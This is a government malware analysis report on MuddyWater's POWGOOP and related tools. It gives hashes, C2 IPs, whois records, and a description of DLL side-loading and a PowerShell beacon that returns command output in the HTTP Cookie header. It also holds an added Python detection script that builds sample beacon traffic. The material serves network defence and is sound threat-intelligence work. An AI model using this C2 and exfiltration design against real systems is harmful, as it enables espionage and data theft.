Analysis Report

MAR-10369127-1.v1 - MuddyWater

Alert Code: AR22-055A

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), the United Kingdom’s National Cyber Security Centre (NCSC-UK), and the National Security Agency (NSA) to provide detailed analysis of 23 files identified as MuddyWater tools. MuddyWater is a group of Iranian government-sponsored advanced persistent threat actors that conducts cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America.



FBI, CISA, CNMF, NCSC-UK, and NSA are distributing this MAR to enable network defense and reduce exposure to Iranian government malicious cyber activity. For more information on malicious Iranian government cyber activity, visit CISA's webpage at https://www.cisa.gov/uscert/iran.



Of the 23 malware samples analyzed, 14 files were identified as variants of the POWGOOP malware family. Two files were identified as JavaScript files that contain a PowerShell beacon. One file was identified as a Mori backdoor sample. Two malicious Microsoft Excel spreadsheets were identified as Canopy malware (also known as Starwhale) that contained macros and two encoded Windows script files, which maintain persistence and collect and exfiltrate the victim's system data to a command and control (C2).



The POWGOOP samples were discovered as Windows executables (not included in this report) and contain three components:



1)    A dynamic-link library (DLL) file renamed as a legitimate filename to enable the DLL side-loading technique.

2)    An obfuscated PowerShell script, disguised as a .dat file, that is used to decrypt a file named "config.txt."

3)    An encoded PowerShell script, disguised as a text file, that contains a beacon to a hardcoded Internet Protocol (IP) address.



These components retrieve encrypted commands from a C2 server. The command is decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.

 

For a downloadable copy of IOCs, see: MAR-10369127-1.v1.stix.


Submitted Files (19)

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141 (Cooperation terms.xls)

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa (goopdate.dll)

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82 (goopdate.dat)

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a (TeresitaJordain_config.txt)

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8 (FML.dll)

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986 (rj.js)

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c (ZaibCb15Ak.xls)

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f (Config2.txt)

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4 (Dore.dat)

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7 (Config.txt)

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051 (libpcre2-8-0.dll)

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2 (AntheHannah_config.txt)

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c (note.js)

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504 (Core.dat)

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a (config.txt)

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9 (config.txt)

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92 (vcruntime140.dll)

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13 (Core.dat)

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca (HeidieLeone.txt)

Additional Files (4)

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e (Outlook.wsf)

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0 (Outlook.wsf)

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418 (Outlook.wsf)

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0 (Outlook.wsf)

IPs (7)

185.117.75.34

185.118.164.21

185.183.96.44

185.183.96.7

192.210.191.188

5.199.133.149

88.119.170.124

Findings

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa

Tags

trojan

Details
Name goopdate.dll
Size 90624 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 a27655d14b0aabec8db70ae08a623317
SHA1 8344f2c1096687ed83c2bbad0e6e549a71b0c0b1
SHA256 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
SHA512 3c9fa512e7360fecc4db3196e850db8b398d1950a21a3a1f529bbc0a1323cc3b4c8d1bf95acb9ceaa794cf135a56c0e761976f17326594ce08c89117b1700514
ssdeep 1536:Ggw+CKmmOmwE1k4XGt2EkxtNh7aZgvADsW/cd+32UVGHgz:RCBTDE1krt2Ebg5+32UQHgz
Entropy 6.359392
Antivirus
ESET a variant of Win32/Agent.ACHN trojan
Symantec Trojan Horse
Trend Micro Trojan.928E7209
Trend Micro HouseCall Trojan.928E7209
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-09-23 02:02:48-04:00
Import Hash 132491700659f9b56970a9b12cbbb348
PE Sections
MD5 Name Raw Size Entropy
dbe1463d7d1b0850df5e47b5320ef5fb header 1024 2.757475
c732c8e6ad0cf8292aa60a9da9dcbe7c .text 54784 6.609888
3bd80fc1bbd1476e125d2e487662e01f .rdata 27648 5.042288
ccd03992b1a52aba460a01a4113d59c8 .data 2560 2.366593
c7a4e8ec050a078d37fff5197af953e2 .rsrc 512 4.712298
2de65738f49b99cdb71355bdc924c55a .reloc 4096 6.411331
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
12db8bcee0... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
Description

This file was identified as a launcher and is contained within an executable "GoogleUpdate.exe" (not included in this submission). The DLL is renamed to the legitimate filename "goopdate.dll" to enable a DLL side-loading technique. Note: goopdate.dll is the name of a module belonging to Goopdate from Google Inc. In DLL side-loading, a malicious DLL is given the name of a file that a legitimate executable depends on, so that the legitimate executable loads and runs the malicious code. For this variant, GoogleUpdate.exe depends on a legitimate file "goopdate.dll"; the malicious POWGOOP DLL is therefore renamed goopdate.dll to force GoogleUpdate.exe to execute the malicious code, which spawns a Rundll32.exe process to launch goopdate.dll with the DllRegisterServer function (Figure 1). This in turn runs a PowerShell script, the "goopdate.dat" file (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82), which decrypts a co-located "config.txt" file (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9), another obfuscated PowerShell script containing the C2 beacon (Figure 2).

Screenshots

Figure 1 - Screenshot of GoogleUpdate.exe spawning a Rundll32.exe process to launch goopdate.dll with the DllRegisterServer function.

Figure 2 - Screenshot of the PowerShell script being decrypted.

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82

Details
Name goopdate.dat
Size 115546 bytes
Type data
MD5 218d4151b39e4ece13d3bf5ff4d1121b
SHA1 28e799d9769bb7e936d1768d498a0d2c7a0d53fb
SHA256 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
SHA512 8f859945f0c3e590db99bb35f4127f34910268c44f94407e98a5399fec44d92523d07230e793209639914afe61d17dfb41273193e30bbfb950b29ffce3d4b9d5
ssdeep 3072:bI+Rz2t2VGAQIP2DR7mOOfKI12sKDrS51ODTKjI2:bpF2t2VV2DNmOOyI8s441FjI
Entropy 7.971267
Antivirus
Bitdefender Generic.Exploit.Donut.2.5DE6F72C
Emsisoft Generic.Exploit.Donut.2.5DE6F72C (B)
Lavasoft Generic.Exploit.Donut.2.5DE6F72C
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
2471a039cb... Related_To ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
2471a039cb... Related_To 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
Description

This file was identified as an obfuscated PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This obfuscated PowerShell script is used to decode and run the additional obfuscated PowerShell script "config.txt" (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

Screenshots

Figure 3 - Screenshot of the de-obfuscated PowerShell script.

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9

Details
Name config.txt
Size 3364 bytes
Type data
MD5 52299ffc8373f58b62543ec754732e55
SHA1 ca97ac295b2cd57501517c0efd67b6f8a7d1fbdf
SHA256 ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
SHA512 6c9dc3ae0d3090bab57285ac1bc86d0fa60096221c99a383cc1a5a7da1c0614dfdbe4e6fa2aea9ff1e8d3415495d2d444c2f15ad9a1fd3847ddb0fc721f101a2
ssdeep 48:oN/rGOTDwOQ0rSt4tD9f+1o09KP/iyrjfODVosSh9lwrjhChwsFKDUGymwx:qroOlfBPz5sSh+w9v
Entropy 5.346853
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
ce9bd1acf3... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
ce9bd1acf3... Connected_To 185.183.96.7
Description

This file was identified as an encrypted PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This PowerShell script is decoded by "goopdate.dat" (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82) and contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]7:443/index.php

--End C2 IP address--



The malware used the hardcoded C2 to pass remote commands to the victim machine. The encrypted commands are decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.



The script uses one to three randomly generated human names as variable and function names (Figure 4). Its Base64 routine is modified by adding or subtracting 2: two consecutive functions (Base64Dec, QueenieSusanneAvril) decrypt the remote commands that are then executed locally, and two consecutive functions (Marlie, Kassandra) encrypt the result and place it in the "Cookie:" parameter that is passed back to the C2 node.



The config.txt file can be run separately as a .ps1 PowerShell script to execute the de-obfuscated code. The victim machine then pulls down any command the threat actor places in the index.php file at 185[.]183[.]96[.]7:443 (e.g., 'whoami') and executes it locally. The script exfiltrates the result of the command as a Base64-encoded string passed in the 'Cookie: <Base64_encoded_string>' part of the packet (Figure 6).
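The Python script below is an added example, not part of this MAR and not code recovered from the samples. It shows how an analyst could triage captured HTTP requests for the beacon pattern described in this section and in the Summary: a GET for index.php whose Cookie header carries the command result as a single Base64 token, optionally sent to one of the C2 addresses listed in this report. The report only states that the Base64 routine is modified by adding or subtracting 2; the example assumes the shift is applied to each raw byte before Base64 encoding and reversed after decoding (the function names encode_result and decode_cookie are the example's own). The sample requests are constructed here rather than taken from the report's packet captures.

```python
import base64
import binascii
import re
from typing import Optional

# C2 addresses as listed in this report's "IPs (7)" section; used only to label matches.
REPORT_C2_IPS = {
    "185.117.75.34", "185.118.164.21", "185.183.96.44", "185.183.96.7",
    "192.210.191.188", "5.199.133.149", "88.119.170.124",
}

# A Cookie value that is one bare Base64 token: no name=value pair and no ';' separators,
# which is how the report describes the exfiltration ('Cookie: <Base64_encoded_string>').
BARE_B64 = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def shift_bytes(data: bytes, delta: int) -> bytes:
    """Add delta to every byte, wrapping at 256 (delta may be negative)."""
    return bytes((b + delta) & 0xFF for b in data)


def encode_result(plaintext: str) -> str:
    """ASSUMED encoder, standing in for the report's Marlie/Kassandra pair:
    +2 on each raw byte, then standard Base64. Used here only to build test data."""
    return base64.b64encode(shift_bytes(plaintext.encode("utf-8"), 2)).decode("ascii")


def decode_cookie(value: str) -> str:
    """ASSUMED decoder, standing in for Base64Dec/QueenieSusanneAvril: Base64-decode,
    then -2 on each byte, recovering the command output the beacon sent back."""
    return shift_bytes(base64.b64decode(value), -2).decode("utf-8", errors="replace")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into its request line and a lowercase header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def triage_request(raw: str) -> Optional[dict]:
    """Return a finding when the request looks like a POWGOOP beacon (a GET whose Cookie
    header is a single bare Base64 token); None for ordinary traffic. known_c2 is True
    when the Host matches an address from this report; decoded is None if the token
    does not decode under the assumed routine (wrong padding, or a different variant)."""
    req = parse_request(raw)
    headers = req["headers"]
    cookie = headers.get("cookie", "")
    if req["method"] != "GET" or not BARE_B64.match(cookie):
        return None
    host = headers.get("host", "").split(":")[0]
    try:
        decoded = decode_cookie(cookie)
    except (binascii.Error, ValueError):
        decoded = None
    return {
        "host": host,
        "target": req["target"],
        "known_c2": host in REPORT_C2_IPS,
        "decoded": decoded,
    }


# Constructed sample traffic (not captures from the report). The first request imitates
# the beacon returning the output of 'whoami'; the second is an ordinary browser request.
SAMPLE_BEACON = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 185.183.96.7\r\n"
    "Cookie: " + encode_result("desktop-test\\analyst") + "\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_BENIGN):
        print(triage_request(sample))
```

If the decoded text from a real capture is unreadable, the shift is probably applied on the other side of the Base64 step, or to the Base64 alphabet rather than the raw bytes; swap the order in decode_cookie and compare the result against the Figure 6 capture. The bare-token check is the useful signal on its own, since browsers always send cookies as name=value pairs.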

Screenshots

Figure 4 - Screenshot of the script.

Figure 5 - Screenshot of the GET request sent over port 443 for "index.php" from the IP address 185[.]183[.]96[.]7.

Figure 6 - Screenshot of the GET request.

185.183.96.7

Tags

command-and-control

URLs
  • 185.183.96.7/index.php
Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.183.96.7"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships
185.183.96.7 Connected_From ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
Description

config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9) attempts to connect to this IP address.

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051

Tags

trojan

Details
Name libpcre2-8-0.dll
Size 96768 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 860f5c2345e8f5c268c9746337ade8b7
SHA1 6c55d3acdc2d8d331f0d13024f736bc28ef5a7e1
SHA256 9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051
SHA512 15b758ada75ae3a6848e3e528e07b19e0efb4156105f0e2ff4486c6df35574c63ccaae5e00d3c4f1ac3f5032f3eb5732179d187979779af4658e8e4dc5020f9f
ssdeep 1536:TjdtPuB/MpXu7QeqqPKaSc9/Sc+Amru3xobZFsWo/dcd+0Q+MoOl5:TfuBwXuUeqqPIkSc4u3xobb+0Q+MRl5
Entropy 6.397339
Antivirus
ESET a variant of Win32/Agent.ADJB trojan
VirusBlokAda BScope.Trojan.Agentb
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-05 03:59:42-04:00
Import Hash 412395ba322a0d1b557db71f338aadde
PE Sections
MD5 Name Raw Size Entropy
b474b7d68214633e93dc1ab3fcad9a4b header 1024 2.769462
d9e1cff126e23d40d396bebc0fe103be .text 55296 6.612472
8528c24241b97c45d2f90f3ef1baceec .rdata 33280 5.178997
96565e257370e82ea6cc20bdc7831a7b .data 2560 2.380258
43041985e356ec1bb76514dd6d7a347f .rsrc 512 4.717679
6b5a16c382d161788b9cc48d74f91543 .reloc 4096 6.435504
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Description

This file was identified as a launcher and is renamed to the legitimate filename "libpcre2-8-0.dll" to enable a DLL side-loading technique. Note: libpcre2-8-0.dll is a library for Mingw-w64, an open-source software development environment. This file has capabilities similar to those of "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92

Tags

trojan

Details
Name vcruntime140.dll
Size 93696 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 cec48bcdedebc962ce45b63e201c0624
SHA1 81f46998c92427032378e5dead48bdfc9128b225
SHA256 dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92
SHA512 661a59b4cdb4aab652b24cb9b7ca54cdee1d50ac3b0479cb418cf8ec2f7bda15fcc2622e6b08a784187ec3f43acd678d1d73efacd43ac33501963d5e4dfe32e9
ssdeep 1536:jjevM3civEZfW15lbrWKIAy4pcd8uHxQEbZFsWo/dcdV0yjHe9c0b5i2MUql5:jzcbfO5lbr6Ay4huHxHbbV0eHe9c0b5I
Entropy 6.386276
Antivirus
AhnLab Trojan/Win.Generic
Avira TR/Agent.fizgi
Bitdefender Trojan.GenericKD.37827502
ESET a variant of Win32/Agent.ADJB trojan
Emsisoft Trojan.GenericKD.37827502 (B)
IKARUS Trojan.Win32.Agent
K7 Trojan ( 005893651 )
Lavasoft Trojan.GenericKD.37827502
McAfee RDN/Generic.dx
Symantec Trojan.Gen.MBT
VirusBlokAda BScope.Trojan.Agentb
Zillya! Trojan.Agent.Win32.2507968
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-11 08:50:42-04:00
Import Hash 99474d9cfb6d6c2c0eada954b5521471
PE Sections
MD5 Name Raw Size Entropy
644538127a7d5372f16bbc62790e1b5d header 1024 2.778786
46d87fd65afee2330ee32fe404fe7657 .text 55808 6.623812
7bc20c2666aeb10cbe1787cdeeb38138 .rdata 29696 5.111049
8adf7f42b993b6d8b658ea5a9d554a49 .data 2560 2.380664
065463fcb19d087772450d47229f013f .rsrc 512 4.717679
1a870fa886d593f0dd1c9ce8816c3a63 .reloc 4096 6.466938
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Description

This file was identified as a launcher and is renamed to the legitimate filename "vcruntime140.dll" to enable a DLL side-loading technique. Note: vcruntime140.dll is a runtime library for Microsoft Visual Studio. This file has capabilities similar to those of "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504

Details
Name Core.dat
Size 222554 bytes
Type data
MD5 a65696d6b65f7159c9ffcd4119f60195
SHA1 570f7272412ff8257ed6868d90727a459e3b179e
SHA256 b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504
SHA512 65661ca585e10699eaded4f722914c79b5922e93ea4ca8ecae4a8e3f1320e7b806996f7a54dffbe9d1cdeda593f08e8d95cd831d57de9d9568ea6d8bd280988b
ssdeep 6144:AD5ss4qHWpWYY3X3YxMNkpMj7vl+AQOjI:Uss4QEWYwYxM+CdZ3
Entropy 7.990578
Antivirus
Bitdefender Generic.Exploit.Donut.2.50F4F7F0
Emsisoft Generic.Exploit.Donut.2.50F4F7F0 (B)
Lavasoft Generic.Exploit.Donut.2.50F4F7F0
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13

Details
Name Core.dat
Size 222554 bytes
Type data
MD5 4a022ea1fd2bf5e8c0d8b2343a230070
SHA1 89df0feca9a447465d41ac87cb45a6f3c02c574d
SHA256 e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13
SHA512 bec85adf79b916ee64c4a4b6f2cf60d8321d7394a2ec299c3547160f552ecae403c6a2a9aa669cf789d4d99b01c637ac1d0da3c9ed8872bb6184b5ad9543d580
ssdeep 6144:HzUl+nQWOJ0h0Q+MhozbM8RTVwS9HTkSaRIJjI:HzNQkC06bZuSBTky
Entropy 7.990584
Antivirus
Bitdefender Generic.Exploit.Donut.2.B85DA16C
Emsisoft Generic.Exploit.Donut.2.B85DA16C (B)
Lavasoft Generic.Exploit.Donut.2.B85DA16C
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4

Tags

trojan

Details
Name Dore.dat
Size 208222 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 6c084c8f5a61c6bec5eb5573a2d51ffb
SHA1 61608ed1de56d0e4fe6af07ecba0bd0a69d825b8
SHA256 7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4
SHA512 4eaa2d6f29d2712f3487ff7e3a463ec4ba711ba36edda422db126840282e8705ebee6304cc9a54433c7fac7759f98a9543eda881726d8b788f4487b8d4f42423
ssdeep 6144:LiJOsC/WBmefvpzeChVsg3euJHs7pdcAOlnI:LLWBmyvp/s5uJHs7pdcvI
Entropy 6.489815
Antivirus
Avira HEUR/AGEN.1144435
Bitdefender Generic.Exploit.Shellcode.PE.1.A192654B
ESET PowerShell/Runner.AA trojan
Emsisoft Generic.Exploit.Shellcode.PE.1.A192654B (B)
IKARUS Trojan.PowerShell.Runner
K7 Riskware ( 0040eff71 )
Lavasoft Generic.Exploit.Shellcode.PE.1.A192654B
Sophos Mal/Swrort-Y
Symantec Trojan Horse
VirusBlokAda BScope.Trojan.Wacatac
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-11 08:50:37-04:00
Import Hash ec0fa343230fe2524df352e5e73f52a2
PE Sections
MD5 Name Raw Size Entropy
57e428c7f6e8430e0380e9a1681a940c header 1024 2.806123
89eb652b81f7b3cd7e9ee9e718575c09 .text 135168 6.614331
4f6c6295c85743cc3a2ca8f5dc2c4648 .rdata 58368 5.330927
3fe517cfbe9700ed9c311661377fcbd9 .data 4096 3.056628
7d123d6987b6fa0f191e9ee2fb0d9484 .rsrc 512 4.711341
320df1e8ed4184af06bb4c62a00cc47b .reloc 8704 6.441951
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a

Details
Name config.txt
Size 3615 bytes
Type data
MD5 b6b0edf0b31bc95a042e13f3768a65c3
SHA1 5168a8880abe8eb2d28f10787820185fe318859e
SHA256 b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
SHA512 669e655ca79c95d8d25e56cb0c4c71574ff74f55e11930e9cdbfb4a3767fce0d09ab362d2f188a153ba25497b8a2508d0501bca342c0558f06e921f603b2218c
ssdeep 48:oOd/U/82KlaUdrSS1A82RBBboWuP7qgGgmzfBUXX7PXTWPJJ5wx:YmP71+Ju
Entropy 5.291145
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
b6133e04a0... Connected_To 185.117.75.34
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.117.75.34

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.117.75.34"...



% Information related to '185.117.75.0 - 185.117.75.255'



% Abuse contact for '185.117.75.0 - 185.117.75.255' is 'abuse@hostsailor.com'



inetnum:        185.117.75.0 - 185.117.75.255

netname:        EU-HOSTSAILOR-20140124

descr:         HostSailor NL Services

country:        NL

admin-c:        AF11712-RIPE

tech-c:         AF11712-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-02-01T08:50:02Z

last-modified: 2016-02-01T08:50:02Z

source:         RIPE



person:         Host Sailor Ltd - Administrative role account

address:        Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +97145577845

nic-hdl:        AF11712-RIPE

mnt-by:         MNT-HS

created:        2014-06-30T16:22:26Z

last-modified: 2019-05-29T09:39:31Z

source:         RIPE

Relationships
185.117.75.34 Connected_From e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
185.117.75.34 Connected_From b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
Description

config.txt (b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a) and HeidieLeone.txt (e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca) attempt to connect to this IP address.

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7

Tags

trojan

Details
Name Config.txt
Size 5037 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 a0421312705e847a1c8073001fd8499c
SHA1 3204447f54adeffb339ed3e00649ae428544eca3
SHA256 9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7
SHA512 32c89ce4ec39c0f05fdd578ac7dbd51a882fdca632a00a591655992f258fe1b870c5ac6732d79c835578fd85c237d69d10886b1bec087217b921b8dbd2d7ab50
ssdeep 96:ND25Bb2G+6C3z+FPyY1PgWuRuSpqq8HRYwC+w7ivocD6ZpY59lmBZ1q0c3:NKnCGO3iFPysIW8YlHRYw5w6F6ZpYUB0
Entropy 5.941005
Antivirus
ESET PowerShell/Agent.FP trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has capabilities similar to those of config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

192.210.191.188

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.arin.net with "n ! NET-192-210-191-0-1"...



NetRange:     192.210.191.0 - 192.210.191.255

CIDR:         192.210.191.0/24

NetName:        CC-192-210-191-0-24

NetHandle:     NET-192-210-191-0-1

Parent:         CC-11 (NET-192-210-128-0-1)

NetType:        Reallocated

OriginAS:     AS36352

Organization: Virtual Machine Solutions LLC (VMSL-100)

RegDate:        2019-03-26

Updated:        2019-03-26

Ref:            https://rdap.arin.net/registry/ip/192.210.191.0





OrgName:        Virtual Machine Solutions LLC

OrgId:         VMSL-100

Address:        12201 Tukwila International Blvd

City:         Seattle

StateProv:     WA

PostalCode:     98168

Country:        US

RegDate:        2016-06-22

Updated:        2020-12-10

Comment:        http://virmach.com/abuse to report abuse.

Ref:            https://rdap.arin.net/registry/entity/VMSL-100





OrgTechHandle: GOLES88-ARIN

OrgTechName: Golestani, Amir

OrgTechPhone: +1-800-877-2176

OrgTechEmail: report@virmach.com

OrgTechRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN



OrgAbuseHandle: GOLES88-ARIN

OrgAbuseName: Golestani, Amir

OrgAbusePhone: +1-800-877-2176

OrgAbuseEmail: report@virmach.com

